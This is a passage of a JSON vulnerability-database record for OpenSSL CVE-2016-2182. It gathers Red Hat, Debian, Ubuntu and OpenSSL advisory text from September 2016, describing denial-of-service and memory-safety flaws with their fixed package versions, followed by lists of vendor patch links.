7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nThis release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer\nto the Release Notes for information on the most significant bug fixes,\nenhancements and component upgrades included in this release. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-373 - Errata for httpd 2.4.29 GA RHEL 7\n\n7. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2182" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "BID", "id": "92557" }, { "db": "VULMON", "id": "CVE-2016-2182" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2182", "trust": 3.0 }, { "db": "BID", "id": "92557", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10171", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10215", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.1 }, { "db": "SECTRACK", "id": "1036688", "trust": 1.1 }, { "db": "SECTRACK", "id": "1037968", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.1 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004780", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148521", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148525", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148524", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2182" }, { "db": "BID", "id": "92557" }, { "db": "JVNDB", "id": "JVNDB-2016-004780" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2182" } ] }, "id": "VAR-201609-0595", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.39427244733333333 }, "last_update_date": "2024-07-23T22:06:46.651000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "hitachi-sec-2017-102", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-102/index.html" }, { "title": "HPSBGN03658", "trust": 0.8, "url": "https://h20565.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05302448" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "SB10171", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10171" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Check for errors in BN_bn2dec()", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=07bed46f332fce8c1d157689a2cdf915a982ae34" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "TLSA-2016-28", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-28j.html" }, { "title": "hitachi-sec-2017-102", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hitachi-sec-2017-102/index.html" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 RHEL 7 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182185 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182187 - security advisory" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 RHEL 6 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182186 - security advisory" }, { "title": "Red Hat: CVE-2016-2182", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2182" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-2182" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Android Security Bulletins: Android Security Bulletin\u2014March 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=65d776aaa82a91341631d2aa61736067" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party 